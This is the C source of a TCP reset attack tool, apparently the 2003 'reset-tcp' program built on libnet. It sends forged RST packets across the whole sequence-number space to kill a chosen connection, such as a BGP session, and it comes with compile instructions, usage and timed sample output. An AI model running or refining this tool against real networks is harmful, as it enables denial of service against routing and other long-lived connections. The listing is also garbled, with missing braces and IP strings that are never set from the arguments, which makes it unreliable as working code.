Build a TCP packet - based on tcp1.c sample code from libnet-1.1.1

  gcc reset-tcp.c -o reset-tcp /usr/lib/libnet.a
   be sure to modify the MAC addresses (enet_src/enet_dst) in the code, or you WILL have problems!
  reset-tcp [interface] [src ip] [src port] [dst ip] [dst port] [window size]
    EXAMPLE (and timing packets sent with /bin/date):
      [root@orc BGP]# date; ./reset-tcp eth1 1 2 65536; date
      Tue Dec 16 21:18:28 CST 2003
      Packets sent: 8192      Sequence guess: 536805376
      Packets sent: 16384     Sequence guess: 1073676288
      Packets sent: 24576     Sequence guess: 1610547200
      Packets sent: 32768     Sequence guess: 2147418112
      Packets sent: 40960     Sequence guess: 2684289024
      Packets sent: 49152     Sequence guess: 3221159936
      Packets sent: 57344     Sequence guess: 3758030848
      packets sent: 65535
      Tue Dec 16 21:18:46 CST 2003

#include <libnet.h>
#include <stdio.h>

int main(int argc, char *argv[])
    int c;
    unsigned long int count=0;
    unsigned long int count2=0;
    unsigned long int seqguess=0;
    unsigned long int seqstart=0;
    unsigned long int seqincrement=0;
    unsigned long int seqmax=4294967295;
    u_char *cp;
    libnet_t *l;
    libnet_ptag_t t;
    char *payload;
    char * device = argv[1];
    u_short payload_s;
    u_long src_ip, dst_ip;
    u_short src_prt, dst_prt;
    char errbuf[LIBNET_ERRBUF_SIZE];

    char sourceip[32]        = "";
    char destinationip[32]    = "";

/* Change these to suit your local environment values */
/* Make enet_dst either the default gateway or destination host */
    u_char enet_src[6] = {0x00, 0x60, 0x08, 0xa1, 0x31, 0xf2};
    u_char enet_dst[6] = {0x00, 0x40, 0x2b, 0x4d, 0xf5, 0x23};
    u_char org_code[3]   = {0x00, 0x00, 0x00};

/* Its only test code, so minimal checking is performed... */
    if (argc<7) { 
      printf("Usage: %s [interface] [src ip] [src port] [dst ip] [dst port] [window size]\n",argv[0]); 
      printf("**Be sure to re-compile with appropriate MAC addresses!!! You were warned.\n");

    src_prt = atoi(argv[3]);
    dst_prt = atoi(argv[5]);
    seqincrement= atoi(argv[6]);
    seqstart= 0;
    seqmax  = 4294967295;    /* 2^32 */

    payload = NULL;
    payload_s = 0;
    src_ip  = libnet_name2addr4(l,sourceip,LIBNET_DONT_RESOLVE);
    dst_ip  = libnet_name2addr4(l,destinationip,LIBNET_DONT_RESOLVE);

for (seqguess=seqstart;seqguess<seqmax-seqincrement;seqguess=seqguess+seqincrement) {
    count++; count2++;
    if (count2==8192) { count2=0; printf("Packets sent: %lu\tSequence guess: %lu\n",count,seqguess); }
    l = libnet_init(LIBNET_LINK,device,errbuf);
    t = libnet_build_tcp(src_prt,dst_prt,seqguess,0x00000001,TH_RST,0,0,0,LIBNET_TCP_H,NULL,0,l,0);
    t = libnet_build_tcp(src_prt,dst_prt,seqguess,0x00000001,TH_RST,0,0,0,LIBNET_TCP_H,NULL,0,l,0);
    t = libnet_build_ipv4(LIBNET_IPV4_H+LIBNET_TCP_H+payload_s,0,242,0,64,IPPROTO_TCP,0,src_ip,dst_ip,NULL,0,l,0);
    t = libnet_build_ethernet(enet_dst,enet_src,ETHERTYPE_IP,NULL,0,l,0);
    c = libnet_write(l);
printf("packets sent: %i\n",count);
return (EXIT_FAILURE); 

标签: socket, libnet
